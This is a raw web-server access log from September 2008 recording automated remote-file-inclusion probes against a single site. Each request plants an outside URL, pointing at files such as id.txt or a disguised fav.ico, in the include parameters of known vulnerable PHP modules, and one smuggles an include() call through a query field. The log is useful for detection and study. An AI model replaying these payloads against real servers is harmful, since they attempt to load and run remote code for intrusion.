209.97.201.206 - - [04/Sep/2008:22:40:25 -0700] "GET /logs/?sourcedir=http://www.nwstars.com/id2.txt?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.810" "jainvestigation.com"
209.250.238.63 - - [04/Sep/2008:22:40:28 -0700] "GET /logs/access_080812.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://goodscanid.thewomanizer.net/rfi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
209.250.238.63 - - [04/Sep/2008:22:40:28 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://goodscanid.thewomanizer.net/rfi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
209.250.238.63 - - [04/Sep/2008:22:40:28 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://goodscanid.thewomanizer.net/rfi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "jainvestigation.com"
89.248.110.152 - - [04/Sep/2008:22:40:47 -0700] "GET /logs/access.log/?sourcedir=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
89.248.110.152 - - [04/Sep/2008:22:40:48 -0700] "GET /?sourcedir=http://www.nwstars.com/arab.txt? HTTP/1.1" 200 916 "-" "libwww-perl/5.805" "jainvestigation.com"
89.248.110.152 - - [04/Sep/2008:22:40:48 -0700] "GET /logs/?sourcedir=http://www.nwstars.com/arab.txt? HTTP/1.1" 200 1939 "-" "libwww-perl/5.805" "jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:41:03 -0700] "GET /logs/access_080825.log/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:43:56 -0700] "GET /logs/access_080825.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:22:44:16 -0700] "GET /logs/access_080825.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:22:44:50 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:22:44:16 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.jainvestigation.com"
66.199.244.42 - - [04/Sep/2008:22:47:04 -0700] "GET //config/dbutil.bck.php?confdir=http://www.geocities.com/fahmyakbar.com/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
121.254.169.86 - - [04/Sep/2008:22:47:57 -0700] "GET /logs/access_080825.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.jainvestigation.com"
66.199.244.42 - - [04/Sep/2008:22:48:18 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.geocities.com/fahmyakbar.com/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.199.244.42 - - [04/Sep/2008:22:48:18 -0700] "GET //config/dbutil.bck.php?confdir=http://www.geocities.com/fahmyakbar.com/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
66.199.244.42 - - [04/Sep/2008:22:49:37 -0700] "GET //config/dbutil.bck.php?confdir=http://www.geocities.com/fahmyakbar.com/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
69.73.188.36 - - [04/Sep/2008:22:51:41 -0700] "GET /logs/access_080825.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.l33tunix.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
69.73.188.36 - - [04/Sep/2008:22:51:41 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.l33tunix.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
69.73.188.36 - - [04/Sep/2008:22:51:41 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.l33tunix.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:22:52:03 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:22:52:03 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:22:52:04 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "jainvestigation.com"
66.199.244.42 - - [04/Sep/2008:22:53:08 -0700] "GET //config/dbutil.bck.php?confdir=http://www.geocities.com/fahmyakbar.com/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
69.73.188.36 - - [04/Sep/2008:22:54:20 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.l33tunix.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
69.73.188.36 - - [04/Sep/2008:22:54:20 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.l33tunix.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
69.73.188.36 - - [04/Sep/2008:22:54:20 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.l33tunix.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
216.246.7.137 - - [04/Sep/2008:22:56:32 -0700] "GET /logs/access.log/index.php?pag=http://www.borsaimmobiliare.net/images/upload/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
216.246.7.137 - - [04/Sep/2008:22:56:32 -0700] "GET /index.php?pag=http://www.borsaimmobiliare.net/images/upload/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
216.246.7.137 - - [04/Sep/2008:22:56:33 -0700] "GET /logs/index.php?pag=http://www.borsaimmobiliare.net/images/upload/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
74.6.18.222 - - [04/Sep/2008:22:57:08 -0700] "GET /logs/access_080513.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.jainvestigation.com"
66.221.91.28 - - [04/Sep/2008:22:57:33 -0700] "GET /logs/access_080825.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.l33tunix.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.jainvestigation.com"
66.221.91.28 - - [04/Sep/2008:22:58:07 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.l33tunix.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.jainvestigation.com"
66.221.91.28 - - [04/Sep/2008:22:57:33 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.l33tunix.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.jainvestigation.com"
66.221.91.28 - - [04/Sep/2008:22:59:58 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.l33tunix.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "jainvestigation.com"
66.221.91.28 - - [04/Sep/2008:22:59:58 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.l33tunix.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "jainvestigation.com"
66.221.91.28 - - [04/Sep/2008:22:59:58 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.l33tunix.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "jainvestigation.com"
163.19.117.1 - - [04/Sep/2008:23:02:59 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "jainvestigation.com"
163.19.117.1 - - [04/Sep/2008:23:02:59 -0700] "GET /logs/send_reminders.php?includedir=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "jainvestigation.com"
163.19.117.1 - - [04/Sep/2008:23:03:00 -0700] "GET /send_reminders.php?includedir=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "jainvestigation.com"
163.19.117.1 - - [04/Sep/2008:23:17:45 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "jainvestigation.com"
163.19.117.1 - - [04/Sep/2008:23:17:46 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "jainvestigation.com"
163.19.117.1 - - [04/Sep/2008:23:17:46 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "jainvestigation.com"
201.6.251.5 - - [04/Sep/2008:23:20:27 -0700] "GET /logs/access_080822.log/akocomments.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
201.6.251.5 - - [04/Sep/2008:23:20:27 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
201.6.251.5 - - [04/Sep/2008:23:20:28 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
163.19.117.1 - - [04/Sep/2008:23:22:04 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.jainvestigation.com"
163.19.117.1 - - [04/Sep/2008:23:22:04 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.jainvestigation.com"
163.19.117.1 - - [04/Sep/2008:23:22:04 -0700] "GET /logs/access_080825.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.jainvestigation.com"
163.19.117.1 - - [04/Sep/2008:23:22:51 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "jainvestigation.com"
163.19.117.1 - - [04/Sep/2008:23:22:52 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "jainvestigation.com"
163.19.117.1 - - [04/Sep/2008:23:22:53 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "jainvestigation.com"
213.92.85.234 - - [04/Sep/2008:23:23:53 -0700] "GET /logs///vwar/backup/errors.php?error=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
213.92.85.234 - - [04/Sep/2008:23:23:53 -0700] "GET ///vwar/backup/errors.php?error=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
213.92.85.234 - - [04/Sep/2008:23:23:53 -0700] "GET /logs/access_080825.log///vwar/backup/errors.php?error=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
213.92.85.234 - - [04/Sep/2008:23:25:04 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
213.92.85.234 - - [04/Sep/2008:23:26:17 -0700] "GET /logs/access_080825.log%20///vwar/backup/errors.php?error=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
163.19.117.1 - - [04/Sep/2008:23:27:27 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.jainvestigation.com"
163.19.117.1 - - [04/Sep/2008:23:27:27 -0700] "GET /logs/access_080825.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.jainvestigation.com"
163.19.117.1 - - [04/Sep/2008:23:27:30 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.jainvestigation.com"
81.23.226.2 - - [04/Sep/2008:23:29:00 -0700] "GET /logs/access_080812.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.67" "jainvestigation.com"
81.23.226.2 - - [04/Sep/2008:23:29:00 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.67" "jainvestigation.com"
81.23.226.2 - - [04/Sep/2008:23:29:01 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.67" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:29:54 -0700] "GET /logs/access_080825.log/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:29:54 -0700] "GET /logs/access_080825.log/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:29:54 -0700] "GET /logs/access_080825.log/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:29:54 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:29:54 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:29:54 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:29:54 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:29:54 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:29:54 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
209.25.221.5 - - [04/Sep/2008:23:30:18 -0700] "GET /logs/access_080808.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.ellinotopos.com/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
209.25.221.5 - - [04/Sep/2008:23:30:18 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.ellinotopos.com/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
209.25.221.5 - - [04/Sep/2008:23:30:18 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.ellinotopos.com/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
89.218.85.18 - - [04/Sep/2008:23:33:25 -0700] "GET /logs/access_080808.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.myphotowebsite.com/dre69//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
89.218.85.18 - - [04/Sep/2008:23:34:00 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.myphotowebsite.com/dre69//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
89.218.85.18 - - [04/Sep/2008:23:33:26 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.myphotowebsite.com/dre69//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:34:50 -0700] "GET /logs/access_080825.log/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:34:50 -0700] "GET /logs/access_080825.log/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:34:50 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:34:50 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:34:50 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:34:51 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:36:56 -0700] "GET /logs/access_080825.log/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:36:56 -0700] "GET /?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 916 "-" "libwww-perl/5.813" "www.jainvestigation.com"
74.55.98.10 - - [04/Sep/2008:23:36:56 -0700] "GET /logs/?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.813" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:37:52 -0700] "GET /logs/access_080825.log/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:37:18 -0700] "GET /logs/access_080825.log/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:37:18 -0700] "GET /logs/access_080825.log/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:37:18 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:37:18 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:37:18 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:37:18 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:37:18 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
66.249.129.210 - - [04/Sep/2008:23:37:18 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:37:22 -0700] "GET /logs/access_080825.log/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:37:22 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:37:22 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
89.218.85.18 - - [04/Sep/2008:23:37:22 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:37:34 -0700] "GET /logs/access_080825.log/modules/My_eGallery/index.php?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
74.53.70.178 - - [04/Sep/2008:23:37:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
